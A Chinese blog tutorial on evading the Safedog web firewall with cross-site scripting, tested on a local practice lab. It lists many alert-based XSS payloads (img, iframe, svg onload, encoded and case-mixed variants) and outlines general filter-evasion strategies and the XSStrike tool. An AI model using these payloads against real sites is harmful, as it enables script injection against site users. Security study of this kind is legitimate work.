【WAF剖析】10种XSS某狗waf绕过姿势,以及思路分析

于 2024-07-22 16:46:56 发布
阅读量672 收藏 4
点赞数 10
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xt350488/article/details/140613459
版权

原文:【WAF 剖析】10 种 XSS 绕过姿势,以及思路分析

xss基础教程参考:https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQ

sql注入waf绕过文章参考: https://mp.weixin.qq.com/s/Dhtc-8I2lBp95cqSwr0YQw

复现

网站安全狗最新v4.0已经准备好

image-20240722104320515

image-20240722104320515

这里用xsslab进行waf绕过测试

image-20240722102257861

image-20240722102257861

还是一样安全狗waf测试

http://192.168.209.149/level1.php?name=<script>alert("hellow world")</script>

image-20240722102220534

image-20240722102220534

基础payload

php

<?php
echo "<script>alert(1)</script>";
?>

img

<img src=javascript:alert("xss")>
<IMG SRC=javascript:alert(String.formCharCode(88,83,83))>
<img scr="URL" style='Xss:expression(alert(xss));'>
<img src="x" onerror=alert(1)>
<img src="x" οnerrοr=eval("alert('xss')")>
<img src=x οnmοuseοver=alert('xss')>

css

<img STYLE="background-image:url(javascript:alert('XSS'))">

form

XSS利用方式1
<form action=javascript:alert('xss') method="get">
<form action=javascript:alert('xss')>
XSS利用方式2
<form method=post action=aa.asp? οnmοuseοver=prompt('xss')>
<form method=post action=aa.asp? οnmοuseοver=alert('xss')>
<form action=1 οnmοuseοver=alert('xss')>

input

<input name="name" value="">
<input value="" οnclick=alert('xss') type="text">
<input name="name" value="" οnmοuseοver=prompt('xss') bad="">
<input name="name" value=""><script>alert('xss')</script>

iframe

<iframe src=javascript:alert('xss');height=5width=1000 /><iframe>
<iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe>
<!--原code-->
<iframe src="data:text/html;base64,<script>alert('xss')</script>">
<!--base64编码-->
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
    
<iframe src="aaa" οnmοuseοver=alert('xss') /><iframe>
<iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>

经过测试以上内容皆执行不了,但是还有一个svg没测试

svg!成功了一个,看来v4.0的安全狗没有对svg进行防护,payload如下

<svg onload=alert(1)>

image-20240722103703228

image-20240722103703228

常见的waf绕过payload

1.大小写绕过

<sCript>alert(1)</Script>

image-20240722130044000

image-20240722130044000

2、双写绕过

image-20240722130917202

image-20240722130917202

3、img

image-20240722130953046

image-20240722130953046

4、onmouseover事件

  • <a onmousemove="do something here"> 当用户鼠标移动时即可运行代码

image-20240722131108228

image-20240722131108228

  • <div onmouseover="do something here"> 当用户鼠标在这个块上面时即可运行(可以配合weight等参数将div覆盖页面,鼠标不划过都不行)

image-20240722131353856

image-20240722131353856

5、onclick事件

button

image-20240722131709995

image-20240722131709995

6、onload事件

例如

<svg onload=alert(1)>

之前已经测试过了,svg的onoad事件可以

7、编码脚本绕过关键字

image-20240722132223214

image-20240722132223214

8、主动闭合标签实现注入代码

image-20240722134140300

image-20240722134140300

9、绕过HTML注释符

image-20240722134616530

image-20240722134616530

10、利用换行符绕过

image-20240722134745914

image-20240722134745914

11、绕过右标签

image-20240722134807050

image-20240722134807050

12、绕过</内容>

image-20240722134857902

image-20240722134857902

字典爆破

image-20240722135712030

image-20240722135712030

这个时候直接一个一个去访问即可

image-20240722141703806

image-20240722141703806

这里我们找到一个iframe的payload,尝试访问,成功加载,但是看源码,标签没有闭合

image-20240722141540870

image-20240722141540870

我们在url中闭合这个标签,就可以了

image-20240722141917556

image-20240722141917556

绕过思路

一、更改提交方式

在默认配置下,为了节省资源,许多WAF只会对GET请求进行过滤拦截,而忽略了对POST请求、Cookie、HTTP Header等其他提交方式的检测。因此,攻击者可以尝试更改有害语句的提交方式,如将GET请求修改为POST请求,或者通过Cookie、HTTP Header等方式提交恶意脚本,以绕过WAF的拦截。

二、混淆伪装绕过

混淆伪装是一种常见的绕过WAF的手段,攻击者通过编码、大小写混淆、双写、转义字符等方式对恶意脚本进行伪装,使其绕过WAF的关键词过滤规则。例如,将JavaScript代码中的关键字进行大小写混淆(如<scriPT>),或者使用Unicode编码Base64编码等方式对代码进行编码。

三、标签和事件函数变换

XSS攻击主要是通过触发HTML标签中的事件函数来执行恶意脚本。因此,WAF会重点识别能够触发事件函数的HTML标签和事件函数字段。攻击者可以尝试使用其他可以执行JavaScript代码的HTML标签(如<svg>, <button>, <img>等)替换常用的<script>标签,或者使用其他事件函数(如onerror, oninput, onmousedown等)替换常用的onclick事件函数,以绕过WAF的拦截。

四、利用WAF的缺陷和配置不当

  1. 「增加WAF负担」:有些WAF在处理大量数据时可能会降低检测精度或放弃检测部分数据包。攻击者可以通过向WAF发送大量正常数据包并夹杂异常数据包的方式,增加WAF的负担,从而绕过WAF的检测。

  2. 「利用WAF配置不当」:WAF的配置可能存在漏洞或不当之处,如只检测部分参数、忽略某些类型的请求等。攻击者可以通过分析WAF的配置规则,构造绕过WAF检测的请求。

  3. 「旁站绕过」:在某些情况下,网站管理员可能只对主站进行了WAF防护,而忽略了旁站或子域名的防护。攻击者可以尝试通过旁站或子域名绕过WAF的防护。

五、使用自动化工具

自动化工具如XSStrike等可以帮助攻击者自动测试WAF的防护效果,并生成绕过WAF的payload。这些工具通常包含多种绕过WAF的技巧和策略,可以显著提高攻击的成功率。

XSStrike开源地址:https://github.com/s0md3v/XSStrike

六、其他技巧

  1. 「利用伪协议」:某些HTML属性支持伪协议(如javascript:),攻击者可以利用这些属性执行恶意脚本。

  2. 「利用CSS跨站」:在某些情况下,攻击者可以利用CSS中的某些特性(如expression())执行JavaScript代码。

  3. 「利用全局变量和函数」:JavaScript中的全局变量和函数(如eval(), window.onload等)可以在不直接引用脚本标签的情况下执行代码,攻击者可以尝试利用这些变量和函数绕过WAF的防护。

七、举例

这里我就拿标签事件函数变换来举例、首先判断标签名称,是否可用比如iframe,它可以正常访问,说明<iframe>标签没有进行过滤

http://192.168.209.149/level1.php?name=<iframe>

image-20240722143819570

image-20240722143819570

标签没有进行过滤,尝试闭合这个标签,ok正常访问

image-20240722144155301

image-20240722144155301

判断属性src,好没有过滤

image-20240722144230962

image-20240722144230962

加了个=就被拦截了,这时候没法继续了,换个事件试试

image-20240722144259675

image-20240722144259675

image-20240722144611518

image-20240722144611518

这里拿onload尝试

image-20240722144645731

image-20240722144645731

需要注意的是,以上绕过WAF的思路和技巧仅供学习和研究网络安全使用,不得用于非法攻击和破坏活动。在实际应用中,网站管理员和WAF开发者应不断更新和完善WAF的防护策略,提高网站的安全性。

小羽网安
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WAF的正确bypass
10-20
总结来说,正确bypass WAF需要全面了解HTTP协议、数据库操作以及WAF的工作原理,通过创新性的测试思路和技巧,才能有效地绕过WAF的防护,达到测试或验证的目的。同时,重要的是保持学习和实践,不断积累经验,才能在...
WAF的实现与架构演进.pptx
05-07
WAF(Web Application Firewall)是一保护 Web 应用程序免受攻击的系统。它可以检测和阻断常见的 Web 攻击,如 SQL 注入、跨站脚本攻击(XSS)、网页木马上传、命令/代码注入、文件包含、敏感文件访问、第三方应用...
xss跨站之waf绕过及安全修复(28)
san3144393495的博客
05-28 1815
然后访问还是正常的,这个就是特殊符号干扰方法,常见的就是#,因为#在web里面是注释的,他是通用的,特符都可以用来干扰,有一些符号就是截断或者注释的做用,代码去匹配一些关键字的时候,防止他匹配的后面或者前面的关键字,来绕过。因为xss,他的执行效果可以由多个代码实现,就是用到其他的函数,功能来替换,在跨站中想实现那功能,也是可以应用到不同的操作语句去实现同一个目的,比如下面这串代码,取得的功能是一样的,去掉最后字符串,访问还是拦截,再去掉alert(1),访问还是拦截,再去掉尖括号里面一个字符。
xsswaf的小姿势
xzh的博客
02-27 1041
可以看见是和我们想的一样 获取svg第一行第一个id的值然后base64解码 并输出 用eval就可以执行alert的操作。然后已经知道eval是用来执行操作的window['ev'+'al']是将eval拆分类似self。是用什么操作我们用console.log看看他输出的是不是我们理解的意思 这里在payload加上。这里payload的意思是将eval拆分然后解码执行svg标签里的内容 解读如下。可以看见这里直接换行是成功也是成功的同理。今天看大佬的视频学到了几个操作。这里的脏字符是换行的意思。
xss怎么绕过html编码,看我如何绕过WAFXSS检测机制
weixin_35665984的博客
07-01 663
概述本文提出了一绕过XSS安全机制的新型方法,这技术由三个阶段组成:确定Payload结构、探测和混淆处理。首先,我们需要针对给定的上下文环境,确定各不同的Payload结构以达到最优的测试效果。接下来就是探测,这里涉及到根据目标所实现的安全机制来进行各字符串测试,并分析目标的响应数据以便基于分析结果来做出安全假设。最后,根据分析结果来判断是否要对Payload进行混淆处理或结构调整。致读...
XSSWaf绕过及工具使用(附靶场通关记录,持续更新)
m0_51468027的博客
02-01 5059
熟悉常见的waf绕过方法和工具使用,附靶场通关记录
lua版waf web防火墙 redis+nginx版
06-23
Web应用程序防火墙(WAF)的主要目的是保护网站免受各恶意攻击,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。通过在HTTP/HTTPS流量和服务器之间设置一层过滤,WAF可以识别并阻止潜在的恶意请求。 **Redis**...
aws-waf-owasp
10-16
AWS WAF OWASP 是一基于云的Web应用防火墙安全指南,旨在帮助用户在云端快速部署Web安全防护策略。此指南结合了实际业务需求和流量分析,为用户提供自定义WAF策略的方法,以应对Open Web Application Security ...
AWD攻防比赛 PHP WAF
10-16
3. **行为分析**:除了静态规则匹配,更高级的WAF还可能涉及动态行为分析,如异常检测,通过分析请求的正常行为模式来识别潜在的攻击行为。 4. **响应处理**:如果请求被判定为恶意,WAF会采取相应的行动,如阻断...
CTFshow--web--xss
pwfortune的博客
07-16 1075
先在自己的服务器写上代码要拿到管理员的cookie , 而不是自己的。
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 1008
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
前端面试题日常练-day97 【Less】
qq_44640575的博客
07-20 380
border-radius()函数用于在Less中生成圆形边框效果。通过设置border-radius()函数,我们可以为元素的边框添加圆角效果,使边框呈现圆形的外观,从而美化页面元素的边框样式。
TinyVue v3.17.0 正式发布,推出了一款基于 Quill 2.0 的富文本编辑器,功能强大、开箱即用!
OpenTiny的博客
07-17 1208
本文由体验技术团队Kagol老师原创~我们非常高兴地宣布,2024年6月26日,TinyVue 发布了 v3.17.0 🎉。TinyVue 每次大版本发布,都会给大家带来一些实用的新特性,上一个版本我们重构了 chart-core,新增 CircleProcessChart 圆环进度图等6个新的图表组件,并增加了 Statistic 数据统计组件。表格图片超链接复制粘贴插入表情文件上传@提醒斜杆菜单v-auto-tip。
LG 选择 Flutter 来增强其智能电视操作系统 webOS
恋猫de小郭的博客
07-17 1700
总的来说,LG 是 Flutter 在 TV 领域的一次新的尝试,并且它是在脱离了 Android 平台的场景下实现的支持,虽然 webOS 并不是什么流行的系统,但是这也体现出了 Flutter 的特点:可以用较低的成本实现较好性能的跨平台。后续,在 LG 的主导下,WebOS 经过进一步修改,转变为智能电视操作系统,于是 WebOS TV 就诞生了,此后 LG 的 TV 基本路线定为 webOS ,在应用层面,WebOS TV 以基于 Web 的技术为基础。然后 LG 为什么选择 webOS?
前端性能优化--懒加载
weixin_43799793的博客
07-19 157
3、同时还可结合 lazy loading 属性,利用浏览器的原生属性,进一步优化图片加载,不过其延迟加载机制完全是由浏览器自身决定的,在不同浏览器上效果不同(BTW,部分浏览器可能并不支持)。2、然后对元素进行监听,当图片进入可视区域时,提取元素的 data-src 即真实的图片地址赋值给 src 属性,就会去发送请求加载图片,实现了懒加载。设置为 1 张 1px*1px 的透明图片用作占位符,以防止出现出错图标。TinyPNG 网站: https://tinypng.com/
[web]-反序列化-绕过__wakeup(转)
mails2008的专栏
07-18 329
终点:很直接是echo $flag,在__destruct中,username==='admin' 和 password==100。反序列化过程中发现起点在终点之前调用,反而是捣乱的,那我们就不需要自动执行__wakeup,绕过的方法,设置的字段数量比实际字段大的值。其实简单的很简单,难得也很难,慢慢学习就好,没必要焦虑,觉得很难,纯粹一个兴趣爱好就行。起点:_wakeup函数中是$this->username='guest',是给赋值;按照常规思路,寻找起点、终点、跳板。
vue3前端开发-如何让自己的网站适合SEO排名规则
yrldjsbk的博客
07-17 245
我们大家都知道,原始出生的vue3项目,原始代码层面,是没有meta标签的,也就是说,不适合SEO排名规则。SEO排名规则,蜘蛛爬虫抓取网站页面的内容,就会把这meta标签内容进行采集,匹配。但是,这个技术要求大家还是应该知道的。黑马教育,课程,前端课程案例项目:小兔鲜儿超市,vue3前端项目案例。想学习vue3前端开发,拿来练习,实战的朋友们,值得一看哦。这个代码,就是我自己手工录入的。录入后,再次在浏览器界面刷新请求服务器。返回的代码模块就可以看见了。自己刚刚手工录入的meta信息出现了。
thinkphp8结合layui2.9 图片上传验证
最新发布
quweiie的专栏
07-21 110
thinkphp8图片上传的验证
waf防火墙事前事中事后详细分析
10-17
WAF(Web Application Firewall)是一应用层防火墙,主要用于保护Web应用程序免受各攻击,如SQL注入、跨站点脚本攻击(XSS)和跨站点请求伪造(CSRF)等。WAF可以分为三类型:事前WAF、事中WAF和事后WAF。 事前WAF是指在Web应用程序接收到请求之前,WAF会对请求进行检查和过滤,以确保请求的合法性。这WAF通常使用正则表达式或规则引擎来检查请求,并根据预定义的规则来拦截恶意请求。事前WAF的优点是可以防止大多数攻击,但缺点是可能会误报或漏报。 事中WAF是指在Web应用程序处理请求时,WAF会对请求进行检查和过滤。这WAF通常使用代理服务器或反向代理服务器来拦截恶意请求,并根据预定义的规则来阻止攻击。事中WAF的优点是可以检测到更多的攻击,但缺点是可能会影响Web应用程序的性能。 事后WAF是指在Web应用程序处理请求后,WAF会对响应进行检查和过滤。这WAF通常使用日志分析工具来检测恶意行为,并根据预定义的规则来阻止攻击。事后WAF的优点是可以检测到更多的攻击,但缺点是可能会导致延迟和资源消耗。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值